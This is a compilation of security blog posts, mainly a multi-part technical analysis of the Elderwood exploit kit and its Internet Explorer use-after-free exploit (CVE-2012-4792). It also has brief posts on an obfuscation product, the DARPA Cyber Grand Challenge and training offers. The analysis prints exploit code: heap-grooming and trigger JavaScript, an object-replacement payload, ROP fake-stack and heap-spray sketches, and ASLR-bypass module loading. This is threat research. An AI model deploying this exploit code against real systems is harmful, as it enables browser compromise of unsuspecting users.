MAST does one more thing to make reverse engineering even more difficult — it ties the execution of the code to a specific device, such as a user’s mobile phone. While using device-specific characteristics to bind a binary to a device is not new (it is extensively used in DRM and some malware, such as Gauss), MAST is able to integrate device-checking into each obfuscation layer as it is woven through the application. The intertwining of environmental keying and obfuscation renders the program far more resistant to reverse-engineering than some of the more common approaches to device-binding.

An attacker must acquire not just any copy of the application, but also the execution environment of the target computer. The whole environment is typically far more challenging to get ahold of, and it contains a much larger quantity of code to analyze. Even if the environment is captured and time is taken to reverse engineer application details, the results will not be useful against the same application running on other hosts, because every host runs its own keyed version of the binary.


In summary, MAST is a suite of compile-time transformations that provide easy-to-use, cross-platform, state-of-the-art software obfuscation. It can be used for a number of purposes, such as preventing attackers from reverse engineering security-related software patches; protecting your proprietary technology; protecting data within an application; and protecting your application from vulnerability hunters. While originally scoped for iOS applications, the technologies are applicable to any software that can be compiled with LLVM.

Dear DARPA: Challenge Accepted.


We are proud to have one of the only seven accepted funded-track proposals to DARPA’s Cyber Grand Challenge.

Computer security experts from academia, industry and the larger security community have organized themselves into more than 30 teams to compete in DARPA’s Cyber Grand Challenge – a first-of-its-kind tournament designed to speed the development of automated security systems able to defend against cyberattacks as fast as they are launched. DARPA also announced today that it has reached an agreement to hold the 2016 Cyber Grand Challenge final competition in conjunction with DEF CON, one of the largest computer security conferences in the world.


Our participation in this program aligns with our development of Javelin, an automated system for simulating attacks against enterprise networks. We have assembled a world-class team of experts in software security, capture the flag, and program analysis to compete in this challenge. As much as we wish the other teams luck in this competition, Trail of Bits is playing to win. Game on!

Introducing Javelin


Javelin shows you how modern attackers would approach and exploit your enterprise. By simulating real-time, real-world attack techniques, Javelin identifies which employees are most likely to be targets of spearphishing campaigns, uncovers security infrastructure weaknesses, and compares overall vulnerability against industry competitors. Javelin benchmarks the efficacy of defensive strategies, and provides customized recommendations for improving security and accelerating threat detection. Highly automated, low touch, and designed for easy adoption, Javelin will harden your existing security and information technology infrastructure.

Read more about Javelin on the Javelin Blog.

Writing Exploits with the Elderwood Kit (Part 2)

In the third part of our five-part series, we investigate how the toolkit user gained control of program flow and what their strategy means for the reliability of their exploit.

Last time, we talked about how the Elderwood kit does almost everything for the kit user except give them a vulnerability to use. We think it is up to the user to discover a vulnerability, trigger and exploit it, then integrate it with the kit. Our analysis indicates that their knowledge of how to do this is poor and the reliability of the exploit suffered as a result. In the sections that follow, we walk through each part of the exploit that the user had to write on their own.

The Document Object Model (DOM)

The HTML Document Object Model (DOM) is a representation of an HTML page, used for accessing and modifying properties. Browsers provide an interface to the DOM via JavaScript. This interface allows websites to have interactive and dynamically generated content. This interface is very complicated and is subject to many security flaws such as the use-after-free vulnerability used by the attackers in the CFR compromise. For example, the Elderwood group has been responsible for discovering and exploiting at least three prior vulnerabilities of this type in Internet Explorer.

Use-after-Free Vulnerabilities

Use-after-free vulnerabilities occur when a program frees a block and then attempts to use it at some later point in program execution. If, before the block is reused, an attacker is able to allocate new data in its place then they can gain control of program flow.

Exploiting a Use-after-Free

  1. Program allocates and then later frees block A
  2. Attacker allocates block B, reusing the memory previously allocated to block A
  3. Attacker writes data into block B
  4. Program uses freed block A, accessing the data the attacker left there
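A minimal C illustration of the four steps above – the behavior is deliberately undefined, and the attacker relies on the allocator placing block B at block A’s old address:

#include <stdlib.h>

typedef struct {
    void (*handler)(void);   /* stands in for a C++ vtable pointer */
} object_t;

int main(void) {
    /* 1. Program allocates, then later frees, block A. */
    object_t *a = malloc(sizeof *a);
    free(a);                      /* a is now a stale pointer */

    /* 2./3. Attacker allocates same-size block B - which the heap
       will likely place at A's old address - and fills it. */
    void **b = malloc(sizeof(object_t));
    *b = (void *)0x41414141;      /* attacker-controlled "vtable" */

    /* 4. Program uses freed block A: if B reused A's memory, this
       dispatches through the attacker's pointer. */
    a->handler();                 /* control of program flow */
    return 0;
}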

In order to take advantage of CVE-2012-4792, the exploit allocated and freed a CButton object. While a weak reference to the freed object was maintained elsewhere in Internet Explorer, the exploit overwrote the freed CButton object with attacker-controlled data. The exploit then triggered a virtual function call on the CButton object, using the weak reference, resulting in control of program execution.

Prepare the Heap

After 16 allocations of the same size occur, Internet Explorer will switch to using the Low Fragmentation Heap (LFH) for further heap allocations. Since these allocations exist on a different heap, they are not usable for exploitation and have to be ignored. To safely skip over the first 16 allocations, the exploit author creates 3000 string allocations of a similar size to the CButton object by assigning the className property on a div tag.

var arrObject = new Array(3000);
var elmObject = new Array(500);
for (var i = 0; i < arrObject.length; i++) {
	arrObject[i] = document.createElement('div');
	arrObject[i].className = unescape("ababababababababababababababababababababa");
}
The contents of the chosen string – repeated “ab”s – are not important. What is important is the size of the allocation it creates. The LFH has an 8-byte granularity for allocations less than 256 bytes, so allocations between 80 and 88 bytes are served from the same bucket. Here is an example memory dump of what the string in memory would look like:

00227af8  61 00 62 00 61 00 62 00-61 00 62 00 61 00 62 00  a.b.a.b.a.b.a.b.
00227b08  61 00 62 00 61 00 62 00-61 00 62 00 61 00 62 00  a.b.a.b.a.b.a.b.
00227b18  61 00 62 00 61 00 62 00-61 00 62 00 61 00 62 00  a.b.a.b.a.b.a.b.
00227b28  61 00 62 00 61 00 62 00-61 00 62 00 61 00 62 00  a.b.a.b.a.b.a.b.
00227b38  61 00 62 00 61 00 62 00-61 00 62 00 61 00 62 00  a.b.a.b.a.b.a.b.
00227b48  61 00 00 00 00 00 00 00-0a 7e a8 ea 00 01 08 ff  a........~......

Then, the exploit author assigns the className of every other div tag to null, freeing the previously created strings when CollectGarbage() is called. This creates holes in the allocated heap memory and a predictable pattern of allocations.

for (var i = 0; i < arrObject.length; i += 2) {
	arrObject[i].className = null;
}
Next, the author creates 500 button elements. As before, they free every other one to create holes and call CollectGarbage() to enable reuse of the allocations.

for (var i = 0; i < elmObject.length; i++) {
	elmObject[i] = document.createElement('button');
}
for (var i = 1; i < arrObject.length; i += 2) {
	arrObject[i].className = null;
}
In one of many examples of reused code in the exploit, the JavaScript array used for heap manipulation is called arrObject. This happens to be the variable name given to an example of how to create arrays found on page 70 of the JavaScript Cookbook.

Trigger the Vulnerability

The code below is responsible for creating the use-after-free condition. The applyElement and appendChild calls create the right conditions and new allocations. The free will occur after setting the outerText property on the q tag and then calling CollectGarbage().

try {
	e0 = document.getElementById("a");
	e1 = document.getElementById("b");
	e2 = document.createElement("q");
	e1.applyElement(e2);
	e1.appendChild(document.createElement('button'));
	e1.applyElement(e0);
	e2.outerText = "";
	e2.appendChild(document.createElement('body'));
} catch (e) {}

At this point, there is now a pointer to memory that has been freed (a stale pointer). In order to continue with the exploit, the memory it points to must be replaced with attacker-controlled data and then the pointer must be used.

Notably, the vulnerability trigger is the only part of the exploit that is wrapped in a try/catch block. In testing, we confirmed that this try/catch is not a necessary condition for triggering the vulnerability or for successful exploitation. If the author were concerned about unhandled exceptions, they could have wrapped all their code in a try/catch instead of only this part. This suggests that the vulnerability trigger is separate from any code the developer wrote on their own and may have been automatically generated.

Further, the vulnerability trigger is the one part of the exploit code that a fuzzer can generate on its own. Such a security testing tool might have wrapped many DOM manipulations in try/catch blocks on every page load to maximize the testing possible without relaunching the browser. Given the number of other unnecessary operations left in the code, it is likely that the output of a fuzzer was pasted into the exploit code and the try/catch it used was left intact.

Replace the Object

To replace the freed CButton object with memory under their control, the attacker consumes 20 allocations from the LFH and then targets the 21st allocation for the replacement. The choice to target the 21st allocation was likely made through observation or experimentation, rather than precise knowledge of heap memory. As we will discuss in the following section, this assumption leads to unreliable behavior from the exploit. If the author had a better understanding of heap operations and changed these few lines of code, the exploit could have been much more effective.

for (var i = 0; i < 20; i++) {
	arrObject[i].className = unescape("ababababababababababababababababababababa");
}
window.location = unescape("%u0d0c%u10abhttps://www.google.com/settings/account");

The window.location line has two purposes: it creates a replacement object and triggers the use of the stale pointer. As with almost every other heap allocation created for this exploit, the unescape() function is called to create a string. This time it is slightly different: the exploit author uses %u encoding to fully control the first DWORD of the allocation, the vtable pointer of an object.

For the replaced object, the memory will look like this:

19eb1c00  10ab0d0c 00740068 00700074 003a0073  ….h.t.t.p.s.:.
19eb1c10  002f002f 00770077 002e0077 006f0067  /./.w.w.w...g.o.
19eb1c20  0067006f 0065006c 0063002e 006d006f  o.g.l.e...c.o.m.
19eb1c30  0073002f 00740065 00690074 0067006e  /.s.e.t.t.i.n.g.
19eb1c40  002f0073 00630061 006f0063 006e0075  s./.a.c.c.o.u.n.
19eb1c50  00000074 00000061 f0608e93 ff0c0000  t...a.....`.....

When window.location is set, the browser goes to the URL provided in the string. This change of location will free all the allocations created by the current page since they are no longer necessary. This triggers the use of the freed object and this is when the attacker gains control of the browser process. In this case, this causes the browser to load “/[unprintablebytes]https://www.google.com/settings/account” on the current domain. Since this URL does not exist, the iframe loading the exploit on the CFR website will show an error page.

In summary, the exploit overwrites a freed CButton object with data that the attacker controls. A very fragile technique was used to overwrite the freed CButton object, and the exploit fails to reliably gain control of execution on exploited browsers as a result. Instead of overwriting a large number of objects that may have been recently freed, the exploit writers assume that the 21st object they overwrite will always be the correct freed CButton object. This decreases the reliability of the exploit because it assumes a predetermined location of the freed CButton object in the freelist.

Now that the vulnerability can be exploited, it can be integrated with the kit by using the provided address we mentioned in the previous post, 0x10ab0d0c. By transferring control to the SWF loaded at that address, the provided ROP chains and staged payload will be run by the victim.


Exploit Reliability

Contrary to popular belief, it is possible for an exploit to fail even on a platform that it “supports.” Exploits for use-after-frees rely on complex manipulation of the heap to perform controlled memory allocations. Assumptions about the state of memory may be broken by total available memory, previously visited websites, the number of CPUs present, or even changes to software running on the host. Therefore, we consider exploit reliability to be a measure of successful payload executions vs. total attempts across these various scenarios.

We simulated real-world use of the Elderwood exploit for CVE-2012-4792 to determine its overall reliability. We built a Windows XP test system with the versions of Internet Explorer, Flash, and Java required by the exploit. Our testing routine started by going to a random website, selected from several popular websites, and then going to our testing website hosting the exploit. We think this is a close approximation of real-world use, since the compromised website is not likely to be anyone’s homepage.

Under these ideal conditions, we determined the reliability of the exploit to be 60% in our testing. Although creating holes is unnecessary for triggering or successfully exploiting the vulnerability, as described in the previous code snippets, we found that reliability drops to about 50% if these operations are not performed. We describe some of the reasons for such low reliability below:

  • The reliance on the constant memory address provided by the SWF. If memory allocations occur elsewhere rather than at the address where the exploit assumes they will be, the browser will crash. For example, if a non-ASLR’d plugin is loaded at 0x10ab0d0c, the exploit will never succeed. This can also occur on Windows XP if a large module is loaded at the default load address of 0x10000000.
  • The assumption that the 21st allocation will be reused by the stale CButton pointer. If the stale CButton pointer reuses any other address, this assumption causes the exploit to fail. In this case, the exploit will dereference 0x00410042 from one of the “ab” string allocations.
  • The use of the garbage collector to trigger the vulnerability. Using the garbage collector is a good way to trigger this vulnerability; however, it can have uncertain side effects. For example, if the heap coalesces, it is likely that the stale pointer will point to a buffer not under the attacker’s control and cause the browser to crash.

Even before testing this exploit, it was clear that it could only target a subset of affected browsers due to its reliance on Flash and other plugins for bypassing DEP and ASLR. We built an ideal test environment with these constraints and found their replacement technique to be a significant source of unreliable behavior. Nearly 50% of website visitors that should have been exploited were not due to the fragility of the replacement technique.


After being provided easy-to-use interfaces to DEP and ASLR bypasses, the user of this kit must only craft an object replacement strategy to create a working exploit. Our evaluation of the object replacement code in this exploit indicates the author’s grasp of this concept was poor and the exploit is unreliable as a result. Reliability of this exploit would have been much higher if the author had a better understanding of heap operations or had followed published methodologies for object replacements. Instead, the author relied upon assumptions about the state of memory and parts of their work appear copied from cookbook example code.

Up until this point, the case could be made that the many examples of copied example code were the result of a false flag. Our analysis indicates that, in the part of the exploit that mattered most, the level of skill displayed by the user remained consistent with the rest of the exploit. If the attacker were feigning incompetence, it is unlikely that this critical section of code would be impaired in more than a superficial way. Instead, this attack campaign lost nearly half of the few website visitors that it could have exploited. Many in the security industry believe that APT groups “weaponize” exploits before using them in the wild. However, continued use of the Elderwood kit for strategic website compromises indicates that neither solid engineering practices nor highly reliable exploit code is required for this attacker group to achieve their goals.

Writing Exploits with the Elderwood Kit (Part 1)

In the second part of our five-part series, we investigate the tools provided by the Elderwood kit for developing exploits from discovered vulnerabilities.

Several mitigations must be avoided or bypassed in order to exploit browser vulnerabilities, even on platforms as old as Windows XP. Elderwood provides tools to overcome these obstacles with little to no knowledge required of their underlying implementation. Historical use of the Elderwood kit for browser exploits has focused on use-after-free vulnerabilities in Internet Explorer. Exploitation of use-after-free vulnerabilities is well documented and systematic, and a quick search reveals several detailed walkthroughs. Exploits of this type have three primary obstacles to overcome:

  • Heap spray technique
  • DEP bypass
  • ASLR bypass

Each component of the kit abstracts a method for overcoming these obstacles in a straightforward way. We examine how these components work, assess their reliability and technical sophistication, and describe how they are exposed to the kit user. Supported targets and the reliability of exploit code are directly tied to the design and implementation decisions behind these components.

Heap Spray and DEP Bypass (today.swf)

Data Execution Prevention (DEP) prevents memory from being implicitly executable. Exploits commonly create a payload in memory as data and then try to execute it. When DEP is enabled, the attacker must have their payload explicitly marked executable. In order to bypass this protection, an exploit can take advantage of code that is already in memory and is marked executable. Many exploits chain together calls to functions to mark their payload executable in a practice sometimes referred to as return-oriented programming (ROP). Internet Explorer 8 on Windows XP and later takes advantage of DEP and this mitigation must be bypassed to successfully execute code.

Today.swf performs the DEP bypass for the user. This Flash document places many copies of a ROP chain in memory so that one will be at a known location (heap spraying). When Internet Explorer is exploited, the exploit pivots the stack to one of these fake stacks instead of the legitimate one. After the stack pivot, the ROP chain executes a sequence of instructions that makes an executable copy of the deobfuscation code that turns xsainfo.jpg into a DLL, then runs it. This can be done from within Flash, a plugin, because it shares the same memory space as the browser rendering process, unlike in Chrome, Safari, and Firefox.
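As an illustration of what the sprayed data contains, a fake stack for a VirtualProtect-style DEP bypass might be laid out as below. In this encoding, each "%uLLLL%uHHHH" pair becomes the little-endian dword 0xHHHHLLLL, so "%u0d0c%u10ab" is 0x10ab0d0c; every other address here is a placeholder of ours, not a gadget recovered from today.swf.

// Illustrative fake stack (post-pivot) for a DEP bypass; all addresses
// except 0x10ab0d0c are placeholders.
var fakeStack = unescape(
    "%u4444%u3333" +   // placeholder address of kernel32!VirtualProtect
    "%u0d0c%u10ab" +   // return address once VirtualProtect completes: the payload
    "%u0d0c%u10ab" +   // lpAddress: page containing the copied payload
    "%u1000%u0000" +   // dwSize: 0x1000 bytes to mark executable
    "%u0040%u0000" +   // flNewProtect: PAGE_EXECUTE_READWRITE (0x40)
    "%u2222%u1111"     // lpflOldProtect: placeholder writable address
);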

The SWF is included before the JavaScript exploit code is loaded. When the SWF loads, its heap spraying code runs automatically; the user does not need to know any details of the technique it uses. The end result is that the heap is filled with fake stack frames, and the kit user can assume that the proper values will be at a specific address, 0x10ab0d0c. The user only needs to know this single value: where to jump.

// the first two %u sequences decode to the dword 0x10ab0d0c, the sprayed address
window.location = unescape("%u0d0c%u10abhttps://www.google.com/settings/account");

For readers following along with our analysis, the software used to obfuscate the Flash component of the exploit is conveniently located on the first page of Google results for “SWF Encryption.” DoSWF is the first result that does not require an email address to download the installer and, as an added bonus, is developed by a Chinese company in Beijing.

As seen in many public exploits, it's possible to perform this same task with only the JavaScript engine within the browser, which would remove the dependency on a third-party plugin. Instead, this exploit will only work on browsers that have Flash installed and enabled. Techniques and libraries for precise heap manipulation in JavaScript are well documented and have existed since at least 2007.
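A minimal plugin-free spray is sketched below; the block size, iteration count, and reuse of the kit's 0x10ab0d0c address are our illustrative choices, not code from the exploit or from any particular library.

// Plugin-free heap spray sketch: fill the heap with copies of the fake
// stack so that address 0x10ab0d0c predictably falls inside sprayed data.
var block = unescape("%u0d0c%u10ab");          // repeated fake-stack words
while (block.length < 0x80000) block += block; // grow to ~1 MB (2 bytes/char)

var spray = [];
for (var i = 0; i < 256; i++) {
    // concatenation defeats string interning and forces a fresh allocation
    spray[i] = block.substring(0, 0x7f000) + i;
}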

ASLR Bypass (Microsoft Office and Java 6)

Address Space Layout Randomization (ASLR) is an exploit mitigation, present on Windows Vista and newer, that randomizes the location of code in memory. ASLR frustrates an attacker's ability to control program flow by making the locations of instruction sequences needed for ROP gadgets unknown. The easiest method to bypass ASLR is to avoid it entirely by locating a module that is not compiled with the Dynamic Base flag, indicating a lack of support for this feature. Once such a module is loaded at a fixed virtual address, the attacker can repurpose known instruction sequences within it as if ASLR did not exist, eliminating the advantage conferred by the mitigation.

In order to bypass ASLR, the kit comes with code to load several modules that are not compiled with the Dynamic Base flag. In this case, modules from Microsoft Office 2007/2010 and the Java 6 plugin without support for ASLR have been added. Memory addresses from within these modules are used to construct the ROP chains embedded in the Flash document.

It is trivial to take advantage of this feature to bypass ASLR. In all likelihood, the kit provides a script that calls the various plugin loading routines necessary to load the correct modules; no further work is required. The kit authors use existing research and techniques off the shelf to develop these scripts: sample code from Oracle is used to load Java for the ASLR bypass. This example code shows up in Google under the search “force java 6”, which is notable because the author needed to load this specific version rather than the latest, which does take advantage of ASLR.

<script type="text/javascript" src="deployJava.js"></script> <!-- Oracle's sample Java deployment script -->
try {
	// navigating to an ms-help:// URL loads an Office Help module (hxds.dll)
	// that is not compiled with the Dynamic Base flag
	location.href = 'ms-help://'
} catch (e) {}

try {
	// this ActiveX control loads a SharePoint/Office module that also
	// lacks ASLR support
	var ma = new ActiveXObject("SharePoint.OpenDocuments.4");
} catch (e) {}

After attempting to load these plugins, config.html sets a value based on which ones succeeded: it sets the innerHTML of the “test” div tag to either “true”, “false”, “default”, or “cat”. Today.swf reads this value to determine which of its built-in ROP chains to load. This means that today.swf directly depends on the results of config.html and the plugins it loads, suggesting they were developed together and provided to the kit user.
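We have not reproduced config.html verbatim, but its selection logic amounts to something like the following hypothetical sketch. The div id and marker strings come from the exploit; the detection calls and the mapping of markers to plugins are our assumptions (deployJava.versionCheck is part of Oracle's deployJava.js).

// Hypothetical reconstruction of config.html's logic, not the original code.
var marker = "default";
try {
    new ActiveXObject("SharePoint.OpenDocuments.4"); // Office modules loadable?
    marker = "true";                                  // assumed mapping
} catch (e) {
    if (deployJava.versionCheck("1.6")) marker = "false"; // fall back to Java 6
}
document.getElementById("test").innerHTML = marker;       // read later by today.swf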

As with the heap spray and DEP bypass, these techniques rely on third-party components to function: unless one of these plugins is installed and enabled, the exploit will fail on Windows 7. The kit relies on the installed Java being outdated, because current versions do take advantage of ASLR; this issue was addressed by a Java 6 update in July 2011, and Java 7 was never affected. In the case of Microsoft Office, the weakness was described in a public walkthrough several months before the attack, yet it remained unpatched until after the attack.

We attempted to measure the number of browsers running these plugins in order to gauge the effectiveness of these ASLR bypasses and, therefore, of the entire exploit. We found that popular websites that track browser statistics neglect to track usage of the Microsoft Office plugins, instead opting to list more common plugins like Silverlight, Google Gears, and Shockwave. In the case of Java 6, even in the attacker's best-case scenario, in which no minor versions of Java had yet been patched, only roughly 30% of website visitors could be successfully exploited.


The Elderwood kit ships with reusable components for developing exploits for use-after-free vulnerabilities. It provides the capability to spray the heap with Adobe Flash, a set of techniques to load modules without support for ASLR, and several ROP chains for various versions of Windows to bypass DEP. The user of these tools needs little to no understanding of the tasks they accomplish. For example, instead of requiring the user to understand anything about memory layouts and heap allocations, the kit lets them simply use a constant address it provides. In fact, readers who made it this far may have a deeper understanding of these components than the people who need to use them.

Many exploit development needs are covered by these tools; however, some tasks are specific to the discovered vulnerability. In order to use the ROP gadgets placed in memory by the SWF, the toolkit user must gain control of program flow. This is specific to the exploitation of each vulnerability, and the toolkit cannot help the user perform this task. We discuss the toolkit user's specific solutions to this problem in the next post.

If you’re interested in learning more about how modern attacks are developed and performed, consider coming to SummerCon early next month and taking one of our trainings. Subscribe to our newsletter to stay up-to-date on our trainings, products and blog posts.

Elderwood and the Department of Labor Hack

Recently, the Department of Labor (DoL) and several other websites were compromised to host a new zero-day exploit in Internet Explorer 8 (CVE-2013-1347). Researchers noted similarities between this attack and earlier ones attributed to Elderwood, a distinct set of tools used to develop several past strategic website compromises. We have not, however, identified any evidence for this conclusion. Several fundamental differences exist that make it unlikely that this latest exploit was produced by the Elderwood kit.

  • The Elderwood kit provides several reusable techniques for spraying the heap with Adobe Flash and bypassing DEP with other plugins. However, the DoL exploit avoids the need for plugins by copying the code for a new exploit technique from Exodus Intelligence. This significantly improved the reliability of the exploit and increased the number of visitors it affected.
  • Elderwood campaigns have hosted their files directly on the compromised website. However, the DoL website was injected with code redirecting the visitor to an attacker-controlled host, which then attempted to load the exploit. This makes it more difficult for researchers to investigate this incident.
  • Elderwood campaigns use primitive host fingerprinting techniques taken from sample code on the internet to determine the exploitability of visitors. However, the DoL fingerprinting code was developed by the attackers to collect significantly more data and is not used for determining exploitability. This fingerprint information is uploaded to the attacker-controlled host for future use.

In addition, we have identified sample code discoverable on the internet as the source of several JavaScript functions that appear in both exploits. For example, the cookie tracking code was copied nearly verbatim from “Using cookies to display number of times a user has visited your page” which includes code originally from the JavaScript Application Cookbook.
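A representative visit counter in that cookbook style appears below; it is our reconstruction, not the verbatim code shared by the two exploits.

// Representative visit-counter code in the cookbook style; not verbatim.
function getCookie(name) {
    var match = document.cookie.match(new RegExp("(^|; )" + name + "=([^;]*)"));
    return match ? unescape(match[2]) : null;
}
function setCookie(name, value, days) {
    var d = new Date();
    d.setTime(d.getTime() + days * 24 * 60 * 60 * 1000);
    document.cookie = name + "=" + escape(value) + "; expires=" + d.toUTCString();
}
var visits = parseInt(getCookie("visits") || "0", 10) + 1;
setCookie("visits", visits, 365); // e.g., to serve the exploit to each visitor only once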

The Elderwood Exploit Kit

Elderwood is a distinct set of reusable tools that has been developed by or for the Aurora APT group (sometimes known as or related to Nitro, VOHO, Violin Panda, or Mandiant Group 8). Our firm has tracked the use of the Elderwood kit due to the unique nature of the strategic website compromises and zero-day exploits it has been used to develop. We will discuss our analysis of this proprietary exploit kit in a series of blog posts this week.

In the blog posts that follow, we use the latest zero-day strategic website compromise attributed to the Elderwood kit as a case study. We use evidence from this attack to determine the sophistication of the tools provided by the kit and determine the capabilities required to operate it. By doing so, we hope to have a more honest discussion about the reality of this threat and the effectiveness of current defenses against it. At the end of our case study, we predict future use and developments of this kit and present recommendations to stay ahead of such attacks in the future.

Case Study Overview

In early December 2012, several websites were compromised and subtly repurposed to host a 0-day exploit for a use-after-free vulnerability in Internet Explorer 6, 7, and 8. The changes to these websites were not detected until several weeks later. The timeline of the attack is shown below.

Figure: timeline of the attack

Security vendors have termed this type of attack, where a public website is compromised in order to exploit its visitors, a “watering hole.” We believe a more descriptive definition is provided by ShadowServer, which describes attacks of this nature as “strategic website compromises.” Each compromised website is strategically selected for the character of the web traffic that visits it. Instead of bringing victims to their own website, the attacker compromises websites that the intended victims already view.

Components of the Attack

Several discrete components must be engineered and integrated by attackers in order to pull off a strategic website compromise. We describe these components below.

  • Vulnerability: Reproducible trigger of a code execution flaw in software installed on client systems, such as Adobe Reader or Internet Explorer.
  • Exploit: Code that uses the vulnerability to execute a program of the attacker’s choice (a payload) on the victim’s computer.
  • Obfuscation: Techniques applied to the exploit and payload to evade network and host-based detection systems.
  • Fingerprinting: Code to determine whether to serve an exploit to a victim’s computer (a bare-bones sketch follows this list).
  • Payload: Shellcode and malware that runs on the victim’s computer to further control it.
  • Compromised website: A website not legitimately owned or operated by the attackers, but that the attackers have manipulated into hosting their exploit and payload code.
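As a concrete illustration of the fingerprinting component, a bare-bones check might look like the sketch below. The user-agent tests and the iframe delivery are our assumptions, not code from config.html; news.html is the exploit page enumerated in the next list.

// Bare-bones fingerprinting sketch; the checks and delivery are illustrative.
var ua = navigator.userAgent;
var isTargetIE = /MSIE [678]\./.test(ua);                      // IE 6, 7, or 8
var isTargetOS = ua.indexOf("Windows NT 5.1") !== -1 ||        // Windows XP
                 ua.indexOf("Windows NT 6.1") !== -1;          // Windows 7
if (isTargetIE && isTargetOS) {
    // only supported targets ever receive the exploit page
    document.write('<iframe src="news.html" width="0" height="0"></iframe>');
}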

The attackers placed several files on the CFR website. We enumerate these files and their roles in the compromise process below; the filenames varied across compromised websites, but they generally correspond to this list.

  • config.html performed fingerprinting of the intended victims and determined whether they were a supported target of the developed exploit code.
  • news.html, robots.txt, and today.swf contained the exploit code for the zero-day vulnerability that had been discovered. robots.txt obfuscated critical sections of the exploit code to mitigate the risk of detection.
  • xsainfo.jpg contained one stage of the malware to be installed on victims that were successfully exploited.

We have posted the original files from this attack for readers to reference (pw: infected). In tomorrow’s post, we investigate the tools provided by the Elderwood kit for developing exploits from discovered vulnerabilities.

If you’re interested in learning more about how modern attacks are developed and performed, consider coming to SummerCon early next month and taking one of our trainings. Subscribe to our newsletter to stay up-to-date on our trainings, products and blog posts.

Pwn2Own Pre-Game

Just in time to get warmed up for Pwn2Own, we are delivering a joint offering of the training courses “Bug Hunting and Analysis 0x65” by Aaron Portnoy and Zef Cekaj and “Assured Exploitation” by Dino Dai Zovi and Alex Sotirov in New York City on January 31 – February 3. Students may take either course individually or both for a $1000 discount. Full course information is available in the Pwn2Own PreGame PDF or in the full blog post after the jump.


